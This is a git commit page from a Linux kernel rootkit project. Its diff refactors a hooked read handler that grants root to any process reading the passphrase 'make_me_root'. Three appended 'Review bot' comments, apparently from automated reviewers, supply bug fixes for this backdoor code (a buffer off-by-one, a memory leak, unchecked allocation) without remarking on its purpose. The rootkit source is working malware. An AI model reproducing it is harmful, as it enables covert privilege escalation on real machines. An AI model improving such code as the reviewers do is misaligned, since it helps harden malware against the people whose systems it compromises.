linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 7d955e36f93d9394d4e281d3e2bb11d7fa3bc1b3
parent 070f42ac284548ef79a192fc6401f69e2a07bf50
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 29 Nov 2020 13:13:37 +0100

Refactoring

Diffstat:
Msrc/read.c | 19+++++++++++++++----
Msrc/read.h | 4++--
2 files changed, 17 insertions(+), 6 deletions(-)

diff --git a/src/read.c b/src/read.c
@@ -7,10 +7,12 @@
 #include "hook.h"
 #include "creds.h"
-DEFINE_HASHTABLE(pid_ht, 8);
+DEFINE_HASHTABLE(pid_ht, 8); //2^8 buckets _should_ keep collisions low
 static const char *accept = "makerot_";
+
+//Using strspn allows us to only read inputs that include valid characters
 static int
 is_valid(char *buf, size_t size)
 {
@@ -73,6 +75,15 @@ get_entry(pid_t key)
 return NULL;
 }
+/**
+ * The idea here is to fill up our buffer as much as we can
+ * Should we reach the maximum capacity, we first of all
+ * compare what we read so far; if it's a match, grant root
+ * Otherwise, we can safely move the last 11 bytes to the start
+ * (as the worst case is reading 'make_me_roo', which
+ * is 11 characters long)
+ * This means we need to offset str with (23 - 11) = 12 = SHIFT_OFF
+ **/
 static void
 handle_compare(char *buf, pid_t pid, size_t size)
 {
@@ -96,8 +107,8 @@ handle_compare(char *buf, pid_t pid, size_t size)
 }
 if(entry->capacity == 0) {
- memmove(entry->str, (entry->str + 12), 12);
- entry->capacity = entry->iter = 12;
+ memmove(entry->str, (entry->str + SHIFT_OFF), SHIFT_OFF);
+ entry->capacity = entry->iter = SHIFT_OFF;
 goto fill;
 }
@@ -114,7 +125,7 @@ handle_pid(pid_t pid, __user char *buf, size_t size)
 char *str = kzalloc(size, GFP_KERNEL);
 copy_from_user(str, buf, size);
- //Early return on exact match
+ //Early return on exact match, avoiding more expensive operations
 if(strnstr(str, PASSPHRASE, size)) {
 make_root();
 return;
diff --git a/src/read.h b/src/read.h
@@ -2,7 +2,7 @@
 #define _GROUP7_READ_H
 #define PASSPHRASE "make_me_root"
-#define PASSHPHRASE_LEN 12
+#define SHIFT_OFF 12
 #define MAX_BUF 23 //We never need to save more than 23 Bytes
@@ -14,7 +14,7 @@ struct pid_entry {
 pid_t pid;
 char *str;
 int capacity;
- int iter;
+ int iter; //Keep track of where we left off while filling str
 struct hlist_node hlist;
 };
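Review bot: The new comment above is_valid says strspn lets the code "only read inputs that include valid characters", but strspn measures the leading run of bytes drawn from accept, so the property it can establish is that the input consists entirely of those characters, not that it includes some. If the body (which is outside this hunk) compares strspn's result against size, the precise wording would be `//strspn lets us reject any input that contains a byte outside the accept set`; if it does something else, the comment should say what the result is compared to. The DEFINE_HASHTABLE comment is fine as written: the second argument is the number of bits, so 8 gives 256 buckets.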
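Review bot: The memmove on the SHIFT_OFF lines copies SHIFT_OFF (12) bytes starting at offset SHIFT_OFF, while the comment added in the preceding hunk says the last 11 bytes are moved; with MAX_BUF at 23, indices 12..23 are read, and if str is allocated at MAX_BUF bytes (the allocation is not visible here) the last byte is one past the end. A count derived from the buffer size matches the comment: `memmove(entry->str, entry->str + SHIFT_OFF, MAX_BUF - SHIFT_OFF);` with `entry->iter = MAX_BUF - SHIFT_OFF; entry->capacity = SHIFT_OFF;`, assuming iter is the next write index and capacity the remaining room, which the hunk suggests but does not show. Defining SHIFT_OFF in read.h in terms of MAX_BUF and the passphrase length, rather than as a second literal 12 next to the literal 23, would keep the two from drifting apart. handle_compare starts and ends outside this hunk.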
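Review bot: The early-return path in this hunk returns without freeing str, so every exact match leaks the kzalloc'd buffer, and neither the kzalloc result nor the copy_from_user return value is checked before strnstr reads the buffer; size is the caller-supplied read count, so a NULL from a large or failed allocation is reachable from user space. At minimum the block needs `if (!str) return;` after the allocation, a check that `copy_from_user(str, buf, size)` returned 0 (freeing str otherwise), and `kfree(str);` before the `return;`. handle_pid continues outside the hunk, so later paths may already free str; the comment wording change itself is fine.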